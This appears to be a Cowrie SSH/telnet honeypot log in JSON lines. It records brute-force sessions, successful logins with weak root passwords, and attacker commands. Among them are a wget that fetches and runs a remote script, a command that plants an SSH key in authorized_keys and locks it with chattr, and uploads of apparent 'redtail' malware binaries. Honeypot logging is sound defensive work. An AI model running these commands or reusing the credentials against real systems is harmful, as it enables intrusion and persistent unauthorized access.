{"eventid":"cowrie.session.closed","duration":12.713614702224731,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:22:50.017364Z","src_ip":"212.227.235.229","session":"e79186d60982"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50567,"dst_ip":"1.2.3.4","dst_port":23,"session":"e036566b9100","protocol":"telnet","message":"New connection: 212.227.235.229:50567 (1.2.3.4:23) [session: e036566b9100]","sensor":"my-vps","timestamp":"2025-08-26T17:22:50.179652Z"}
{"eventid":"cowrie.session.closed","duration":12.794690370559692,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:23:02.974278Z","src_ip":"212.227.235.229","session":"e036566b9100"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50873,"dst_ip":"1.2.3.4","dst_port":23,"session":"c12fd5e72aa1","protocol":"telnet","message":"New connection: 212.227.235.229:50873 (1.2.3.4:23) [session: c12fd5e72aa1]","sensor":"my-vps","timestamp":"2025-08-26T17:23:03.228582Z"}
{"eventid":"cowrie.session.closed","duration":12.713989973068237,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:23:15.942486Z","src_ip":"212.227.235.229","session":"c12fd5e72aa1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51168,"dst_ip":"1.2.3.4","dst_port":23,"session":"9c8b48682730","protocol":"telnet","message":"New connection: 212.227.235.229:51168 (1.2.3.4:23) [session: 9c8b48682730]","sensor":"my-vps","timestamp":"2025-08-26T17:23:16.180704Z"}
{"eventid":"cowrie.session.closed","duration":12.82745885848999,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:23:29.008096Z","src_ip":"212.227.235.229","session":"9c8b48682730"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51459,"dst_ip":"1.2.3.4","dst_port":23,"session":"6c9ba8137d1e","protocol":"telnet","message":"New connection: 212.227.235.229:51459 (1.2.3.4:23) [session: 6c9ba8137d1e]","sensor":"my-vps","timestamp":"2025-08-26T17:23:29.283894Z"}
{"eventid":"cowrie.session.closed","duration":12.68042778968811,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:23:41.964229Z","src_ip":"212.227.235.229","session":"6c9ba8137d1e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51749,"dst_ip":"1.2.3.4","dst_port":23,"session":"d1411b2d8b5c","protocol":"telnet","message":"New connection: 212.227.235.229:51749 (1.2.3.4:23) [session: d1411b2d8b5c]","sensor":"my-vps","timestamp":"2025-08-26T17:23:42.166369Z"}
{"eventid":"cowrie.session.closed","duration":12.75195574760437,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:23:54.918248Z","src_ip":"212.227.235.229","session":"d1411b2d8b5c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52036,"dst_ip":"1.2.3.4","dst_port":23,"session":"80667ddd7b1f","protocol":"telnet","message":"New connection: 212.227.235.229:52036 (1.2.3.4:23) [session: 80667ddd7b1f]","sensor":"my-vps","timestamp":"2025-08-26T17:23:55.166051Z"}
{"eventid":"cowrie.session.closed","duration":12.787898302078247,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:24:07.953877Z","src_ip":"212.227.235.229","session":"80667ddd7b1f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52338,"dst_ip":"1.2.3.4","dst_port":23,"session":"d618ec3d0610","protocol":"telnet","message":"New connection: 212.227.235.229:52338 (1.2.3.4:23) [session: d618ec3d0610]","sensor":"my-vps","timestamp":"2025-08-26T17:24:08.341341Z"}
{"eventid":"cowrie.session.closed","duration":12.672250032424927,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:24:21.013518Z","src_ip":"212.227.235.229","session":"d618ec3d0610"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52637,"dst_ip":"1.2.3.4","dst_port":23,"session":"3e3577983eb5","protocol":"telnet","message":"New connection: 212.227.235.229:52637 (1.2.3.4:23) [session: 3e3577983eb5]","sensor":"my-vps","timestamp":"2025-08-26T17:24:21.321490Z"}
{"eventid":"cowrie.session.closed","duration":12.664535760879517,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:24:33.985937Z","src_ip":"212.227.235.229","session":"3e3577983eb5"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49436,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee777907850b","protocol":"ssh","message":"New connection: 217.72.205.35:49436 (1.2.3.4:22) [session: ee777907850b]","sensor":"my-vps","timestamp":"2025-08-26T17:24:47.021279Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:24:47.022995Z","src_ip":"217.72.205.35","session":"ee777907850b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":16262,"dst_ip":"1.2.3.4","dst_port":22,"session":"03fa086df2cf","protocol":"ssh","message":"New connection: 212.227.125.160:16262 (1.2.3.4:22) [session: 03fa086df2cf]","sensor":"my-vps","timestamp":"2025-08-26T17:25:20.920329Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T17:25:23.176774Z","src_ip":"212.227.125.160","session":"03fa086df2cf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T17:25:23.205284Z","src_ip":"212.227.125.160","session":"03fa086df2cf"}
{"eventid":"cowrie.login.success","username":"root","password":"ubuntu@123","message":"login attempt [root/ubuntu@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T17:25:32.983083Z","src_ip":"212.227.125.160","session":"03fa086df2cf"}
{"eventid":"cowrie.session.closed","duration":"17.3","message":"Connection lost after 17.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:25:38.259656Z","src_ip":"212.227.125.160","session":"03fa086df2cf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34606,"dst_ip":"1.2.3.4","dst_port":22,"session":"98993056ae25","protocol":"ssh","message":"New connection: 212.227.125.160:34606 (1.2.3.4:22) [session: 98993056ae25]","sensor":"my-vps","timestamp":"2025-08-26T17:25:38.279180Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T17:25:38.280157Z","src_ip":"212.227.125.160","session":"98993056ae25"}
{"eventid":"cowrie.client.kex","hassh":"5f904648ee8964bef0e8834012e26003","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 5f904648ee8964bef0e8834012e26003","sensor":"my-vps","timestamp":"2025-08-26T17:25:38.339334Z","src_ip":"212.227.125.160","session":"98993056ae25"}
{"eventid":"cowrie.login.success","username":"root","password":"ubuntu@123","message":"login attempt [root/ubuntu@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T17:25:38.520114Z","src_ip":"212.227.125.160","session":"98993056ae25"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T17:25:51.946756Z","src_ip":"212.227.125.160","session":"98993056ae25"}
{"eventid":"cowrie.command.input","input":"chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a","message":"CMD: chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a","sensor":"my-vps","timestamp":"2025-08-26T17:25:51.947532Z","src_ip":"212.227.125.160","session":"98993056ae25"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/96abae0475aed33d163866113bf441296b0f7de7c3175e634e29a5b0f5aa4014","size":80,"shasum":"96abae0475aed33d163866113bf441296b0f7de7c3175e634e29a5b0f5aa4014","duplicate":false,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/96abae0475aed33d163866113bf441296b0f7de7c3175e634e29a5b0f5aa4014 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:25:52.008926Z","src_ip":"212.227.125.160","session":"98993056ae25"}
{"eventid":"cowrie.session.file_upload","filename":"clean.sh","outfile":"var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","shasum":"d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","message":"SFTP Uploaded file \"clean.sh\" to var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","sensor":"my-vps","timestamp":"2025-08-26T17:25:52.069088Z","src_ip":"212.227.125.160","session":"98993056ae25"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm7","outfile":"var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","shasum":"229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","message":"SFTP Uploaded file \"redtail.arm7\" to var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","sensor":"my-vps","timestamp":"2025-08-26T17:25:52.071076Z","src_ip":"212.227.125.160","session":"98993056ae25"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm8","outfile":"var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","shasum":"89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","message":"SFTP Uploaded file \"redtail.arm8\" to var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","sensor":"my-vps","timestamp":"2025-08-26T17:25:52.073867Z","src_ip":"212.227.125.160","session":"98993056ae25"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.i686","outfile":"var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","shasum":"ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","message":"SFTP Uploaded file \"redtail.i686\" to var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","sensor":"my-vps","timestamp":"2025-08-26T17:25:52.076325Z","src_ip":"212.227.125.160","session":"98993056ae25"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.x86_64","outfile":"var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","shasum":"d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","message":"SFTP Uploaded file \"redtail.x86_64\" to var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","sensor":"my-vps","timestamp":"2025-08-26T17:25:52.078778Z","src_ip":"212.227.125.160","session":"98993056ae25"}
{"eventid":"cowrie.session.file_upload","filename":"setup.sh","outfile":"var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","shasum":"783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","message":"SFTP Uploaded file \"setup.sh\" to var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","sensor":"my-vps","timestamp":"2025-08-26T17:25:52.079855Z","src_ip":"212.227.125.160","session":"98993056ae25"}
{"eventid":"cowrie.session.closed","duration":"13.9","message":"Connection lost after 13.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:25:52.140951Z","src_ip":"212.227.125.160","session":"98993056ae25"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60954,"dst_ip":"1.2.3.4","dst_port":23,"session":"dc5add4c5529","protocol":"telnet","message":"New connection: 212.227.235.229:60954 (1.2.3.4:23) [session: dc5add4c5529]","sensor":"my-vps","timestamp":"2025-08-26T17:27:59.723699Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T17:28:00.237558Z","src_ip":"212.227.235.229","session":"dc5add4c5529"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T17:28:01.731747Z","src_ip":"212.227.235.229","session":"dc5add4c5529"}
{"eventid":"cowrie.session.closed","duration":2.7799975872039795,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:28:02.503612Z","src_ip":"212.227.235.229","session":"dc5add4c5529"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60966,"dst_ip":"1.2.3.4","dst_port":23,"session":"00e3069de859","protocol":"telnet","message":"New connection: 212.227.235.229:60966 (1.2.3.4:23) [session: 00e3069de859]","sensor":"my-vps","timestamp":"2025-08-26T17:28:02.710887Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-26T17:28:03.225708Z","src_ip":"212.227.235.229","session":"00e3069de859"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T17:28:03.241064Z","src_ip":"212.227.235.229","session":"00e3069de859"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-26T17:28:03.468876Z","src_ip":"212.227.235.229","session":"00e3069de859"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:28:04.683820Z","src_ip":"212.227.235.229","session":"00e3069de859"}
{"eventid":"cowrie.session.closed","duration":1.9763495922088623,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:28:04.687124Z","src_ip":"212.227.235.229","session":"00e3069de859"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35706,"dst_ip":"1.2.3.4","dst_port":22,"session":"cce0e5563493","protocol":"ssh","message":"New connection: 212.227.125.160:35706 (1.2.3.4:22) [session: cce0e5563493]","sensor":"my-vps","timestamp":"2025-08-26T17:28:06.134833Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T17:28:06.135731Z","src_ip":"212.227.125.160","session":"cce0e5563493"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T17:28:06.183898Z","src_ip":"212.227.125.160","session":"cce0e5563493"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T17:28:06.576875Z","src_ip":"212.227.125.160","session":"cce0e5563493"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T17:28:06.753927Z","src_ip":"212.227.125.160","session":"cce0e5563493"}
{"eventid":"cowrie.command.input","input":"wget http://23.146.184.21/adb.sh; chmod 777 *; sh adb.sh x86","message":"CMD: wget http://23.146.184.21/adb.sh; chmod 777 *; sh adb.sh x86","sensor":"my-vps","timestamp":"2025-08-26T17:28:06.754641Z","src_ip":"212.227.125.160","session":"cce0e5563493"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/958e74ac463ee3e75e7731e9747ee99a246446506abef9b030bfa21e76109516","size":138,"shasum":"958e74ac463ee3e75e7731e9747ee99a246446506abef9b030bfa21e76109516","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/958e74ac463ee3e75e7731e9747ee99a246446506abef9b030bfa21e76109516 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:28:06.803637Z","src_ip":"212.227.125.160","session":"cce0e5563493"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:28:06.855737Z","src_ip":"212.227.125.160","session":"cce0e5563493"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39710,"dst_ip":"1.2.3.4","dst_port":23,"session":"dfcdfb65abcf","protocol":"telnet","message":"New connection: 212.227.235.229:39710 (1.2.3.4:23) [session: dfcdfb65abcf]","sensor":"my-vps","timestamp":"2025-08-26T17:28:55.631009Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42300,"dst_ip":"1.2.3.4","dst_port":23,"session":"761c27d8314b","protocol":"telnet","message":"New connection: 212.227.235.229:42300 (1.2.3.4:23) [session: 761c27d8314b]","sensor":"my-vps","timestamp":"2025-08-26T17:29:11.601391Z"}
{"eventid":"cowrie.session.closed","duration":30.879655599594116,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:29:26.510589Z","src_ip":"212.227.235.229","session":"dfcdfb65abcf"}
{"eventid":"cowrie.session.closed","duration":31.877725839614868,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:29:43.479051Z","src_ip":"212.227.235.229","session":"761c27d8314b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59186,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9597bd646b5","protocol":"ssh","message":"New connection: 212.227.235.229:59186 (1.2.3.4:22) [session: c9597bd646b5]","sensor":"my-vps","timestamp":"2025-08-26T17:30:34.943696Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T17:30:35.451486Z","src_ip":"212.227.235.229","session":"c9597bd646b5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T17:30:35.452271Z","src_ip":"212.227.235.229","session":"c9597bd646b5"}
{"eventid":"cowrie.login.success","username":"root","password":"QWE!@#123","message":"login attempt [root/QWE!@#123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T17:30:37.733761Z","src_ip":"212.227.235.229","session":"c9597bd646b5"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:30:39.253104Z","src_ip":"212.227.235.229","session":"c9597bd646b5"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63246,"dst_ip":"1.2.3.4","dst_port":22,"session":"79271f736d28","protocol":"ssh","message":"New connection: 217.72.205.35:63246 (1.2.3.4:22) [session: 79271f736d28]","sensor":"my-vps","timestamp":"2025-08-26T17:31:39.232634Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:31:39.234315Z","src_ip":"217.72.205.35","session":"79271f736d28"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":6102,"dst_ip":"1.2.3.4","dst_port":22,"session":"847c73118ee2","protocol":"ssh","message":"New connection: 212.227.125.160:6102 (1.2.3.4:22) [session: 847c73118ee2]","sensor":"my-vps","timestamp":"2025-08-26T17:31:55.486450Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-26T17:31:55.604240Z","src_ip":"212.227.125.160","session":"847c73118ee2"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512",